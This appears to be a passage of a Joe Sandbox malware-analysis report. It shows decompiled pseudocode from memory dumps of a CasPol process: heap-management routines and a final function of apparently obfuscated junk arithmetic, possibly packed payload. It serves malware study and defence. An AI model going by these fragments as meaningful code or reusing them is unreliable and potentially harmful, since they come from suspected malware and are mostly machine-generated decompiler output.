                                                                					_t107 =  *((intOrPtr*)(_t169 - 0x1c));
                                                                					if(_t107 > 0xa) {
                                                                						L45:
                                                                						_push(_t148);
                                                                						_push(0);
                                                                						_push( *((intOrPtr*)(_t169 - 0x1c)));
                                                                						_push(_t157);
                                                                						_push(2);
                                                                						goto L46;
                                                                					} else {
                                                                						switch( *((intOrPtr*)(( *(_t107 + 0x16dfcfb) & 0x000000ff) * 4 +  &M016DFCE3))) {
                                                                							case 0:
                                                                								_push(_t148);
                                                                								_push(0);
                                                                								_push( *((intOrPtr*)(_t169 - 0x1c)));
                                                                								_push(_t157);
                                                                								_push(3);
                                                                								goto L46;
                                                                							case 1:
                                                                								_push(__ecx);
                                                                								_push(__ebx);
                                                                								_push( *((intOrPtr*)(__edi + 0x18)));
                                                                								_push(__edx);
                                                                								_push(0xc);
                                                                								goto L46;
                                                                							case 2:
                                                                								_push(__ecx);
                                                                								_push(__ebx);
                                                                								_push(3);
                                                                								_push(__edx);
                                                                								__ecx = 0;
                                                                								goto L47;
                                                                							case 3:
                                                                								_push(__ecx);
                                                                								_push(__ebx);
                                                                								_push( *((intOrPtr*)(__ebp - 0x1c)));
                                                                								_push(__edx);
                                                                								_push(0xe);
                                                                								goto L46;
                                                                							case 4:
                                                                								_push(__ecx);
                                                                								_push(__ebx);
                                                                								_push(8);
                                                                								_push(__edx);
                                                                								_push(0xd);
                                                                								L46:
                                                                								goto L47;
                                                                							case 5:
                                                                								goto L45;
                                                                						}
                                                                					}
                                                                					L47:
                                                                					_t98 = E016EA80D(_t168);
                                                                				}
                                                                				return E0167D0D1(_t98);
                                                                			}
                                                                0x016dfb60
                                                                0x016dfb66
                                                                0x016dfb6d
                                                                0x016dfb70
                                                                0x016dfb73
                                                                0x016dfb78
                                                                0x016dfb7d
                                                                0x016dfb8c
                                                                0x016dfb90
                                                                0x016dfbbf
                                                                0x016dfbbf
                                                                0x016dfbc6
                                                                0x016dfbcd
                                                                0x016dfc18
                                                                0x016dfc18
                                                                0x016dfc23
                                                                0x016dfc3d
                                                                0x016dfc3d
                                                                0x016dfc25
                                                                0x016dfc25
                                                                0x016dfc2b
                                                                0x016dfc2d
                                                                0x016dfc33
                                                                0x00000000
                                                                0x00000000
                                                                0x016dfc33
                                                                0x016dfbcf
                                                                0x016dfbd9
                                                                0x016dfbdf
                                                                0x016dfc00
                                                                0x016dfc06
                                                                0x016dfbe1
                                                                0x016dfbe1
                                                                0x016dfbe3
                                                                0x016dfbe9
                                                                0x016dfbf5
                                                                0x016dfbeb
                                                                0x016dfbee
                                                                0x016dfbf0
                                                                0x016dfbf0
                                                                0x016dfbf7
                                                                0x016dfbfb
                                                                0x016dfc09
                                                                0x016dfc10
                                                                0x016dfc16
                                                                0x00000000
                                                                0x00000000
                                                                0x016dfc16
                                                                0x016dfbcd
                                                                0x016dfb7d
                                                                0x016dfb60
                                                                0x016dfb54
                                                                0x016dfb22
                                                                0x016dfae3
                                                                0x016dfae3
                                                                0x016dfaed
                                                                0x00000000
                                                                0x00000000
                                                                0x016dfaed
                                                                0x016dfae1
                                                                0x016dfad5
                                                                0x016dfa8c
                                                                0x016dfc44
                                                                0x016dfc72
                                                                0x016dfc7c
                                                                0x016dfc82
                                                                0x016dfc82
                                                                0x016dfc84
                                                                0x016dfc8a
                                                                0x016dfcca
                                                                0x016dfcca
                                                                0x016dfccb
                                                                0x016dfccc
                                                                0x016dfccf
                                                                0x016dfcd0
                                                                0x00000000
                                                                0x016dfc8c
                                                                0x016dfc93
                                                                0x00000000
                                                                0x016dfc9a
                                                                0x016dfc9b
                                                                0x016dfc9c
                                                                0x016dfc9f
                                                                0x016dfca0
                                                                0x00000000
                                                                0x00000000
                                                                0x016dfca4
                                                                0x016dfca5
                                                                0x016dfca6
                                                                0x016dfca9
                                                                0x016dfcaa
                                                                0x00000000
                                                                0x00000000
                                                                0x016dfcae
                                                                0x016dfcaf
                                                                0x016dfcb0
                                                                0x016dfcb2
                                                                0x016dfcb3
                                                                0x00000000
                                                                0x00000000
                                                                0x016dfcb7
                                                                0x016dfcb8
                                                                0x016dfcb9
                                                                0x016dfcbc
                                                                0x016dfcbd
                                                                0x00000000
                                                                0x00000000
                                                                0x016dfcc1
                                                                0x016dfcc2
                                                                0x016dfcc3
                                                                0x016dfcc5
                                                                0x016dfcc6
                                                                0x016dfcd2
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016dfc93
                                                                0x016dfcd3
                                                                0x016dfcd5
                                                                0x016dfcd5
                                                                0x016dfcdf

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b96bc7eeec13097f25dfcde7b107423fd8a5345a078d731bd051702699331e08
                                                                • Instruction ID: 15c15964023b4d4452173c6a5f77a5c0450f9f9521607427a5553cb65d726819
                                                                • Opcode Fuzzy Hash: b96bc7eeec13097f25dfcde7b107423fd8a5345a078d731bd051702699331e08
                                                                • Instruction Fuzzy Hash: 84815C70D002469FDB19CF69C8906BAFBF1FF48304F54819AE946AB381D374A992CF64
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 93%
                                                                			E016EDBD2(intOrPtr* __ecx, unsigned int __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                				char _v5;
                                                                				signed short _v12;
                                                                				unsigned int _v16;
                                                                				intOrPtr* _v20;
                                                                				signed int _v24;
                                                                				signed int _v28;
                                                                				signed int _v32;
                                                                				intOrPtr _v36;
                                                                				signed short _v40;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				void* __ebp;
                                                                				signed int* _t75;
                                                                				signed short _t77;
                                                                				intOrPtr _t78;
                                                                				signed int _t92;
                                                                				signed int _t98;
                                                                				signed int _t99;
                                                                				signed short _t105;
                                                                				unsigned int _t108;
                                                                				void* _t112;
                                                                				unsigned int _t119;
                                                                				signed int _t124;
                                                                				intOrPtr _t137;
                                                                				signed char _t139;
                                                                				signed int _t140;
                                                                				unsigned int _t141;
                                                                				signed char _t142;
                                                                				intOrPtr _t152;
                                                                				signed int _t153;
                                                                				signed int _t158;
                                                                				signed int _t159;
                                                                				intOrPtr _t172;
                                                                				signed int _t176;
                                                                				signed int _t178;
                                                                				signed short _t182;
                                                                				intOrPtr _t183;
                                                                
                                                                				_t119 = __edx;
                                                                				_v20 = __ecx;
                                                                				_t152 = _a4;
                                                                				_t172 = 0;
                                                                				_t182 = __edx >> 0x0000000c ^  *(__edx + 0x18) ^  *0x1716114;
                                                                				_v16 = __edx;
                                                                				_v36 = 0;
                                                                				_v5 = 0xff;
                                                                				_v40 = _t182;
                                                                				_v24 = _t182 >> 0x10;
                                                                				if(_t152 == 0) {
                                                                					L14:
                                                                					_t124 =  *(_t119 + 0x12) & 0x0000ffff;
                                                                					_v24 = _t124;
                                                                					_t183 = _v36;
                                                                					_t53 = _t119 + 0x10; // 0x10
                                                                					_t75 = _t53;
                                                                					_v28 = _t75;
                                                                					_t77 =  *_t75 & 0x0000ffff;
                                                                					_v12 = _t77;
                                                                					L15:
                                                                					while(1) {
                                                                						if(_t183 != 0) {
                                                                							L20:
                                                                							_t153 = _t77 + 0x00000001 & 0x0000ffff;
                                                                							asm("lock cmpxchg [ebx], cx");
                                                                							_t119 = _v16;
                                                                							_t77 = _t77 & 0x0000ffff;
                                                                							_v12 = _t77;
                                                                							if(_t153 == (_t77 & 0x0000ffff) + 1) {
                                                                								if(_t77 == 0) {
                                                                									_t78 = _t172;
                                                                									L27:
                                                                									_t119 = L016ED016(_t119, _t183, _t119, _t78);
                                                                									E0163FFB0(_t119, _t172, _t183 + 8);
                                                                									_t183 = _t172;
                                                                									if(_t119 != 0) {
                                                                										E016EC52D(_v20,  *((intOrPtr*)(_v20 + 0x78 + ( *(((_v40 & 0x0000ffff) + 7 >> 3) + 0x160aff8) & 0x000000ff) * 4)), _t119, _a8);
                                                                									}
                                                                									L29:
                                                                									_t172 = 1;
                                                                									if(_t183 != 0) {
                                                                										_t72 = _t183 + 8; // 0x8
                                                                										E0163FFB0(_t119, 1, _t72);
                                                                									}
                                                                									L31:
                                                                									return _t172;
                                                                								}
                                                                								if((_t77 & 0x0000ffff) != _v24 - 1) {
                                                                									goto L29;
                                                                								}
                                                                								_t78 = 2;
                                                                								goto L27;
                                                                							}
                                                                							_t124 = _v24;
                                                                							continue;
                                                                						}
                                                                						if(_t77 == 0 || (_t77 & 0x0000ffff) == _t124 - 1) {
                                                                							_t183 = E016EE018(_t119,  &_v5);
                                                                							if(_t183 == 0) {
                                                                								_t172 = 1;
                                                                								goto L31;
                                                                							}
                                                                							goto L19;
                                                                						} else {
                                                                							L19:
                                                                							_t77 = _v12;
                                                                							goto L20;
                                                                						}
                                                                					}
                                                                				}
                                                                				_t92 = _t182 & 0x0000ffff;
                                                                				_v28 = _t92;
                                                                				_t137 =  *((intOrPtr*)(__ecx + 0x78 + ( *((_t92 + 7 >> 3) + 0x160aff8) & 0x000000ff) * 4));
                                                                				_t98 =  *((intOrPtr*)(_t137 + 0x24));
                                                                				_t158 = _t152 - (_v24 & 0x0000ffff) - __edx;
                                                                				_v24 = _t98;
                                                                				_t99 = _t158;
                                                                				_v32 = _t158;
                                                                				_t139 =  *(_t137 + 0x28) & 0x000000ff;
                                                                				if(_t98 == 0) {
                                                                					_v12 = _t99 >> _t139;
                                                                					_t159 = _t158 & (1 << _t139) - 0x00000001;
                                                                					_t105 = _v12;
                                                                				} else {
                                                                					_t105 = E0166D340(_t99 * _v24, _t139, _t99 * _v24 >> 0x20);
                                                                					_v12 = _t105;
                                                                					_t159 = _v32 - _v28 * _t105;
                                                                				}
                                                                				if(_t159 == 0) {
                                                                					_t140 =  *(_t119 + 0x14) & 0x0000ffff;
                                                                					if(_t140 >= _t105) {
                                                                						_t140 = _t105 & 0x0000ffff;
                                                                					}
                                                                					 *(_t119 + 0x14) = _t140;
                                                                					_t141 = _t105 + _t105;
                                                                					_t142 = _t141 & 0x0000001f;
                                                                					_t176 = 3;
                                                                					_t178 =  !(_t176 << _t142);
                                                                					_t108 =  *(_t119 + (_t141 >> 5) * 4 + 0x20);
                                                                					do {
                                                                						asm("lock cmpxchg [ebx], edx");
                                                                					} while ((_t108 & _t178) != 0);
                                                                					if((_t108 >> _t142 & 0x00000001) != 0) {
                                                                						_t119 = _v16;
                                                                						_t172 = 0;
                                                                						if( *((char*)(_t119 + 0x1d)) > 1) {
                                                                							_t112 = E016ED864(_t119, _a4 - _t119, _t182 & 0x0000ffff, 0,  &_v32);
                                                                							_t184 = _t112;
                                                                							if(_t112 != 0xffffffff) {
                                                                								asm("lock xadd [ecx], edx");
                                                                								E016ED8DF(_v20, _t119, _t184, 2, _a8);
                                                                							}
                                                                						}
                                                                						goto L14;
                                                                					}
                                                                					_push(_t142);
                                                                					_push(_v12);
                                                                					E016EA80D( *_v20, 0x11, _a4, _v16);
                                                                					_t172 = 0;
                                                                				}
                                                                 			}
                                                                0x016edc7f
                                                                0x016edc81
                                                                0x016edc81
                                                                0x016edc84
                                                                0x016edc88
                                                                0x016edc8d
                                                                0x016edc95
                                                                0x016edc9b
                                                                0x016edca0
                                                                0x016edca2
                                                                0x016edca6
                                                                0x016edca6
                                                                0x016edcb0
                                                                0x016edcd1
                                                                0x016edcd4
                                                                0x016edcda
                                                                0x016edcec
                                                                0x016edcf1
                                                                0x016edcf6
                                                                0x016edd0c
                                                                0x016edd1a
                                                                0x016edd1a
                                                                0x016edcf6
                                                                0x00000000
                                                                0x016edcda
                                                                0x016edcb5
                                                                0x016edcb6
                                                                0x016edcc5
                                                                0x016edcca
                                                                0x016edcca

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: efde6453b6da94dfdb550894d244c29cd48bb062de9a6c7f637b0528f0c28bd5
                                                                • Instruction ID: c79a6d6360404dfcefe05229f56fe9133500bdd41369ee56881fd6cb3a4ef157
                                                                • Opcode Fuzzy Hash: efde6453b6da94dfdb550894d244c29cd48bb062de9a6c7f637b0528f0c28bd5
                                                                • Instruction Fuzzy Hash: 6A713A76E011299FCB14DF99CC849BEBBF5EF88210B004259E845EB384D735C906CB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 97%
                                                                			E016F28EC(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
                                                                				char _v5;
                                                                				signed int _v12;
                                                                				signed int _v16;
                                                                				intOrPtr _v20;
                                                                				signed int _v24;
                                                                				intOrPtr _v28;
                                                                				signed int _v32;
                                                                				signed int _v36;
                                                                				intOrPtr _v40;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				unsigned int _t62;
                                                                				unsigned int _t69;
                                                                				signed int _t71;
                                                                				signed int _t72;
                                                                				signed int _t77;
                                                                				intOrPtr _t85;
                                                                				unsigned int _t95;
                                                                				signed int _t98;
                                                                				signed int _t100;
                                                                				void* _t104;
                                                                				signed short _t108;
                                                                				signed int _t113;
                                                                				intOrPtr _t115;
                                                                				signed int _t116;
                                                                				intOrPtr _t117;
                                                                				signed int _t118;
                                                                				intOrPtr _t120;
                                                                				signed int _t121;
                                                                				signed int _t122;
                                                                				signed int _t124;
                                                                				signed int _t125;
                                                                				signed int _t126;
                                                                				signed int _t136;
                                                                				signed int _t137;
                                                                				signed int _t140;
                                                                				signed int _t145;
                                                                				intOrPtr _t147;
                                                                				signed int _t148;
                                                                				void* _t156;
                                                                
                                                                				_t115 = _a4;
                                                                				_v40 = __edx;
                                                                				_t147 = __ecx;
                                                                				_v20 = __ecx;
                                                                				if(__edx != _t115) {
                                                                					_t115 = _t115 + 2;
                                                                				}
                                                                				_t62 = _t115 + 7 >> 3;
                                                                				_t120 = _t62 + 1;
                                                                				_v28 = _t120;
                                                                				if(( *(_t147 + 0x38) & 0x00000001) != 0) {
                                                                					_t120 = _t62 + 2;
                                                                					_v28 = _t120;
                                                                				}
                                                                				_t64 = _t120 + _t120 & 0x0000ffff;
                                                                				_t136 = _a8 & 0x00000001;
                                                                				_v36 = _t120 + _t120 & 0x0000ffff;
                                                                				_v12 = _t136;
                                                                				if(_t136 == 0) {
                                                                					E01642280(_t64, _t147);
                                                                					_t136 = _v12;
                                                                				}
                                                                				_v5 = 0xff;
                                                                				while(1) {
                                                                					L7:
                                                                					_t121 = 0;
                                                                					_t145 =  *(_t147 + 8);
                                                                					_v24 =  *(_t147 + 0xc) & 1;
                                                                					_v16 = 0;
                                                                					if(_t145 == 0) {
                                                                						goto L17;
                                                                					}
                                                                					_t108 =  *0x1716110; // 0x3951a168
                                                                					_v32 = _t108 & 0x0000ffff;
                                                                					do {
                                                                						_t156 = _v36 - ( *(_t145 - 4) & 0x0000ffff ^ _t145 - 0x00000004 & 0x0000ffff ^ _v32);
                                                                						if(_t156 < 0) {
                                                                							__eflags = _v24;
                                                                							_t121 = _t145;
                                                                							_t113 =  *_t145;
                                                                							_v16 = _t121;
                                                                							if(_v24 == 0) {
                                                                								L15:
                                                                								_t145 = _t113;
                                                                								goto L16;
                                                                							}
                                                                							__eflags = _t113;
                                                                							if(_t113 == 0) {
                                                                								goto L15;
                                                                							}
                                                                							_t145 = _t145 ^ _t113;
                                                                							goto L16;
                                                                						}
                                                                						if(_t156 <= 0) {
                                                                							L18:
                                                                							if(_t145 != 0) {
                                                                								_t122 =  *0x1716110; // 0x3951a168
                                                                								_t36 = _t145 - 4; // -4
                                                                								_t116 = _t36;
                                                                								_t137 = _t116;
                                                                								_t69 =  *_t116 ^ _t122 ^ _t116;
                                                                								__eflags = _t69;
                                                                								if(_t69 >= 0) {
                                                                									_t71 = _t69 >> 0x00000010 & 0x00007fff;
                                                                									__eflags = _t71;
                                                                									if(_t71 == 0) {
                                                                										L36:
                                                                										_t72 = 0;
                                                                										__eflags = 0;
                                                                										L37:
                                                                										_t139 = _t137 - (_t72 << 0x0000000c) & 0xfffff000;
                                                                										__eflags = (0x0000abed ^  *((_t137 - (_t72 << 0x0000000c) & 0xfffff000) + 0x16)) -  *((intOrPtr*)((_t137 - (_t72 << 0x0000000c) & 0xfffff000) + 0x14));
                                                                										if(__eflags == 0) {
                                                                											_t77 = E016F25DD(_t147, _t139, __eflags, _t116, _v28, _a8,  &_v5);
                                                                											__eflags = _t77;
                                                                											if(_t77 == 0) {
                                                                												L39:
                                                                												_t148 = 0;
                                                                												__eflags = _v12;
                                                                												if(_v12 != 0) {
                                                                													L42:
                                                                													return _t148;
                                                                												}
                                                                												E0163FFB0(_t116, _t145, _v20);
                                                                												L41:
                                                                												_t148 = 0;
                                                                												__eflags = 0;
                                                                												goto L42;
                                                                											}
                                                                											_t46 = _t116 + 8; // 0x4
                                                                											_t148 = _t46;
                                                                											_t140 = (( *_t116 ^  *0x1716110 ^ _t116) >> 0x00000001 & 0x00007fff) * 8 - 8;
                                                                											_t85 = _v20;
                                                                											__eflags =  *(_t85 + 0x38) & 0x00000001;
                                                                											if(( *(_t85 + 0x38) & 0x00000001) != 0) {
                                                                												_t118 = _t116 + 0x10;
                                                                												__eflags = _t118 & 0x00000fff;
                                                                												if((_t118 & 0x00000fff) == 0) {
                                                                													_t148 = _t118;
                                                                													_t140 = _t140 - 8;
                                                                													__eflags = _t140;
                                                                												}
                                                                											}
                                                                											_t117 = _v40;
                                                                											_t124 =  *_t145;
                                                                											__eflags = _t117 - _t140;
                                                                											if(_t117 >= _t140) {
                                                                												_t125 = _t124 & 0xfffffeff;
                                                                												__eflags = _t125;
                                                                												 *_t145 = _t125;
                                                                											} else {
                                                                												_t126 = _t124 | 0x00000100;
                                                                												_push(_t126);
                                                                												 *_t145 = _t126;
                                                                												E016F2506(_t148, _t140, _t140 - _t117);
                                                                												_t85 = _v20;
                                                                											}
                                                                											__eflags = _v12;
                                                                											if(_v12 == 0) {
                                                                												E0163FFB0(_t117, _t145, _t85);
                                                                											}
                                                                											__eflags = _a8 & 0x00000002;
                                                                											if((_a8 & 0x00000002) != 0) {
                                                                												E0166FA60(_t148, 0, _t117);
                                                                											}
                                                                											goto L42;
                                                                										}
                                                                										_push(_t122);
                                                                										_push(0);
                                                                										E016EA80D( *((intOrPtr*)(_t147 + 0x20)), 0x12, _t139, _t116);
                                                                										goto L39;
                                                                									}
                                                                									_t137 = _t116 - (_t71 << 3);
                                                                									_t95 =  *_t137 ^ _t122 ^ _t137;
                                                                									__eflags = _t95;
                                                                									if(_t95 < 0) {
                                                                										L34:
                                                                										_t98 =  *(_t137 + 4) ^ _t122 ^ _t137;
                                                                										__eflags = _t98;
                                                                										L35:
                                                                										_t72 = _t98 & 0x000000ff;
                                                                										goto L37;
                                                                									}
                                                                									_t100 = _t95 >> 0x00000010 & 0x00007fff;
                                                                									__eflags = _t100;
                                                                									if(_t100 == 0) {
                                                                										goto L36;
                                                                									}
                                                                									_t137 = _t137 + _t100 * 0xfffffff8;
                                                                									__eflags = _t137;
                                                                									goto L34;
                                                                								}
                                                                								_t98 =  *_t145 ^ _t122 ^ _t116;
                                                                								goto L35;
                                                                							}
                                                                							if(_t136 == 0) {
                                                                								E0163FFB0(_t115, _t145, _t147);
                                                                							}
                                                                							_t104 = E016F3149(_t147, _t115, _a8);
                                                                							_t146 = _t104;
                                                                							if(_t104 == 0) {
                                                                								goto L41;
                                                                							} else {
                                                                								if(_v12 == 0) {
                                                                									E01642280(_t104, _t147);
                                                                								}
                                                                								_v5 = 0xff;
                                                                								E016F2876(_t147, _t146);
                                                                								_t136 = _v12;
                                                                								goto L7;
                                                                							}
                                                                						}
                                                                						_t113 =  *(_t145 + 4);
                                                                						if(_v24 == 0 || _t113 == 0) {
                                                                							_t121 = _v16;
                                                                							goto L15;
                                                                						} else {
                                                                							_t121 = _v16;
                                                                							_t145 = _t145 ^ _t113;
                                                                						}
                                                                						L16:
                                                                					} while (_t145 != 0);
                                                                					L17:
                                                                					_t145 = _t121;
                                                                					goto L18;
                                                                				}
                                                                			}

                                                                0x016f2acf
                                                                0x016f2ad6
                                                                0x016f2ad9
                                                                0x016f2adb
                                                                0x016f2add
                                                                0x016f2af9
                                                                0x016f2af9
                                                                0x016f2aff
                                                                0x016f2adf
                                                                0x016f2adf
                                                                0x016f2ae7
                                                                0x016f2aea
                                                                0x016f2aef
                                                                0x016f2af4
                                                                0x016f2af4
                                                                0x016f2b01
                                                                0x016f2b05
                                                                0x016f2b08
                                                                0x016f2b08
                                                                0x016f2b0d
                                                                0x016f2b11
                                                                0x016f2b1b
                                                                0x016f2b20
                                                                0x00000000
                                                                0x016f2b11
                                                                0x016f2a60
                                                                0x016f2a61
                                                                0x016f2a6b
                                                                0x00000000
                                                                0x016f2a6b
                                                                0x016f2a1f
                                                                0x016f2a25
                                                                0x016f2a25
                                                                0x016f2a27
                                                                0x016f2a38
                                                                0x016f2a3d
                                                                0x016f2a3d
                                                                0x016f2a3f
                                                                0x016f2a3f
                                                                0x00000000
                                                                0x016f2a3f
                                                                0x016f2a2c
                                                                0x016f2a2c
                                                                0x016f2a31
                                                                0x00000000
                                                                0x00000000
                                                                0x016f2a36
                                                                0x016f2a36
                                                                0x00000000
                                                                0x016f2a36
                                                                0x016f2a0c
                                                                0x00000000
                                                                0x016f2a0c
                                                                0x016f29a1
                                                                0x016f29a4
                                                                0x016f29a4
                                                                0x016f29b0
                                                                0x016f29b5
                                                                0x016f29b9
                                                                0x00000000
                                                                0x016f29bf
                                                                0x016f29c3
                                                                0x016f29c6
                                                                0x016f29c6
                                                                0x016f29cd
                                                                0x016f29d3
                                                                0x016f29d8
                                                                0x00000000
                                                                0x016f29d8
                                                                0x016f29b9
                                                                0x016f2980
                                                                0x016f2983
                                                                0x016f2990
                                                                0x00000000
                                                                0x016f2989
                                                                0x016f2989
                                                                0x016f298c
                                                                0x016f298c
                                                                0x016f2995
                                                                0x016f2995
                                                                0x016f2999
                                                                0x016f2999
                                                                0x00000000
                                                                0x016f2999

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d8b1cb39049c95244c5b35370ec7d7ee33ce4ef3e428a242d02ef31163a909b8
                                                                • Instruction ID: 75519e6b274423b8d0eaae4106d76ae09a009aa90dcaed95ed8b60f310bea347
                                                                • Opcode Fuzzy Hash: d8b1cb39049c95244c5b35370ec7d7ee33ce4ef3e428a242d02ef31163a909b8
                                                                • Instruction Fuzzy Hash: E871E231A0010A9FDB25CF6DCCA06AEBBE2EF88250F14856DEA15D7384DB34D946CB94
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 58%
                                                                			E00423220() {
                                                                				signed int _t32;
                                                                				signed int _t33;
                                                                				signed int _t34;
                                                                				void* _t39;
                                                                				signed char _t42;
                                                                				signed int _t44;
                                                                				signed char _t47;
                                                                				void* _t53;
                                                                				void* _t54;
                                                                				signed int _t55;
                                                                				void* _t56;
                                                                				signed int _t60;
                                                                				signed int _t61;
                                                                				signed int _t62;
                                                                				signed int _t63;
                                                                				signed int _t65;
                                                                				signed int _t66;
                                                                
                                                                				_t33 = _t32 & 0x853fd4e9;
                                                                				asm("das");
                                                                				asm("rol dword [0xd918f40f], 0x70");
                                                                				asm("adc ebp, [0x35beec61]");
                                                                				_t62 = _t61 ^  *0x77b439ce;
                                                                				_t66 = _t65 ^  *0xd11b3805;
                                                                				asm("rcl dword [0xa1cafd33], 0xf");
                                                                				asm("adc [0x7e84b4cf], esi");
                                                                				_t42 = (_t39 + 0xd8f96164 | 0x000000e2) - 1;
                                                                				 *0xae1227fc =  *0xae1227fc + _t63;
                                                                				 *0x1277eeda =  *0x1277eeda >> 0x31;
                                                                				if(_t33 == 0xe896e921) {
                                                                					__eax = __eax ^  *0xb9e06975;
                                                                					__ebp = __ebp -  *0x874a513e;
                                                                					asm("adc bh, [0x9915ad34]");
                                                                					_t28 = __ecx;
                                                                					__ecx =  *0xf14c3e26;
                                                                					 *0xf14c3e26 = _t28;
                                                                					 *0xaeff63d7 =  *0xaeff63d7 >> 0x1c;
                                                                					asm("sbb dh, 0xb3");
                                                                					_push(__ebx);
                                                                					if(__esi >= 0) {
                                                                						 *0x5dca2772 =  *0x5dca2772 - __ebp;
                                                                						asm("movsw");
                                                                						 *0x5f11cce4 = __dh;
                                                                						__edi = __edi - 1;
                                                                						__ebx = __ebx | 0x587d12ee;
                                                                						 *0xddd0401b =  *0xddd0401b >> 0x5d;
                                                                						L1();
                                                                						asm("adc ebp, [0x2e0215e8]");
                                                                						asm("sbb dl, 0x0");
                                                                						if( *0xddd0401b < 0) {
                                                                							__edx = __edx +  *0x6dd38b71;
                                                                							asm("stosd");
                                                                							__ebx = __ebx - 1;
                                                                							asm("cmpsw");
                                                                							__edi = __edi +  *0x36e532dc;
                                                                							asm("sbb al, [0xbaec0330]");
                                                                							 *0x69dc11f =  *0x69dc11f ^ __esp;
                                                                							__edi = __edi +  *0xcede2edc;
                                                                							__eax =  *0x6424586a * 0x9a98;
                                                                							asm("stosd");
                                                                							__ecx = __ecx - 1;
                                                                						}
                                                                					}
                                                                				}
                                                                				L1:
                                                                				_t42 = _t42 + 0x4044a4c7;
                                                                				asm("sbb dh, [0x448f6410]");
                                                                				_t60 = _t60 +  *0xfd6804f7;
                                                                				L1();
                                                                				_t36 = _t36 +  *0x4505d66;
                                                                				if(_t36 > 0) {
                                                                					 *0xf29b0476 =  *0xf29b0476 & _t36;
                                                                					 *0xc6faa32 =  *0xc6faa32 + _t33;
                                                                					if( *0xc6faa32 <= 0) {
                                                                						 *0xdd024877 =  *0xdd024877 & _t60;
                                                                						_t7 = _t33;
                                                                						_t33 =  *0x425540d7;
                                                                						 *0x425540d7 = _t7;
                                                                						_push(_t63);
                                                                						if( *0xdd024877 < 0) {
                                                                							_t60 = _t60 |  *0x20946671;
                                                                							asm("adc [0xc19767d5], edx");
                                                                							_push(0xe1c522ec);
                                                                							 *0xd830f51a =  *0xd830f51a ^ _t42;
                                                                							 *0x5128aeb3 =  *0x5128aeb3 + _t42;
                                                                							 *0xe1394881 =  *0xe1394881 + _t62;
                                                                							if(( *0x12fcafbb & 0x868d36f0) < 0) {
                                                                								asm("adc esi, 0xd2bb676d");
                                                                								 *0xd3fe81d1 =  *0xd3fe81d1 << 0xd3;
                                                                								asm("sbb edx, [0x70e392cf]");
                                                                								asm("adc edi, 0xbeb73a37");
                                                                								 *0xa69ded3e = _t62;
                                                                								_t42 = _t42 | 0x000000f2;
                                                                								asm("movsb");
                                                                								 *0xf976a99 =  *0xf976a99 - _t42;
                                                                								asm("scasd");
                                                                								_pop(_t34);
                                                                								_push( *0x2cc1f27d * 0x1799 - 0x9226e9);
                                                                								_t63 = _t63 + 1;
                                                                								 *0xc6f3fb94 =  *0xc6f3fb94 >> 0x1f;
                                                                								_t62 = _t62 + 0xe14d5af7;
                                                                								asm("ror dword [0xc49844cf], 0xc2");
                                                                								asm("adc ecx, 0xbfeceb07");
                                                                								asm("rcr dword [0x98ef2c6f], 0xcf");
                                                                								_t33 = _t34 & 0x03955083;
                                                                								_t66 = _t66 + 0xcf13d83e;
                                                                								 *0x623d31c7 =  *0x623d31c7 + _t62;
                                                                								if( *0x623d31c7 > 0) {
                                                                									_t63 =  *0x9683ed76;
                                                                									_t33 = _t33 |  *0x9d81c308;
                                                                									 *0x5ebc2f93 =  *0x5ebc2f93 << 0x52;
                                                                									 *0x70307ac2 = _t36;
                                                                									 *0x6ae5bf04 = _t36;
                                                                									 *0xc5784922 =  *0xc5784922 ^ _t36;
                                                                									asm("sbb ebx, [0x212cc8bd]");
                                                                									_t12 = _t42;
                                                                									_t42 =  *0x447c9036;
                                                                									 *0x447c9036 = _t12;
                                                                									if( *0xc5784922 == 0) {
                                                                										 *0x4186d9ed =  *0x4186d9ed | _t42;
                                                                										 *0x8e57f3d7 =  *0x8e57f3d7 + _t42;
                                                                										_pop(_t53);
                                                                										_t54 = _t53 +  *0x73e6a806;
                                                                										_pop(_t63);
                                                                										_t60 = _t60 |  *0xad6f3ec7;
                                                                										 *0x6ce3e128 =  *0x6ce3e128 << 0x4f;
                                                                										asm("sbb edx, 0x27eea2c4");
                                                                										_t66 = _t66 |  *0x71601ece;
                                                                										 *0x53689cd3 =  *0x53689cd3 >> 0x33;
                                                                										if(( *0x2a9b886c & _t60) >= 0) {
                                                                											asm("rol byte [0xf026b93c], 0xcf");
                                                                											asm("lodsb");
                                                                											_t60 = _t60 +  *0x58bf6bdd;
                                                                											_pop(_t44);
                                                                											_push( *0x5c86a0ff);
                                                                											_t63 =  *0x32016da3;
                                                                											asm("lodsd");
                                                                											asm("adc [0x9e374984], cl");
                                                                											_t55 = _t54 +  *0x4696add0;
                                                                											_t36 =  *0xdfd1626e;
                                                                											_t42 = (_t44 | 0x01a88d9a) -  *0x81117f0a;
                                                                											 *0x7ae6b800 =  *0x7ae6b800 >> 0xeb;
                                                                											asm("rcl byte [0xbe7a8d2], 0xd4");
                                                                											asm("cmpsb");
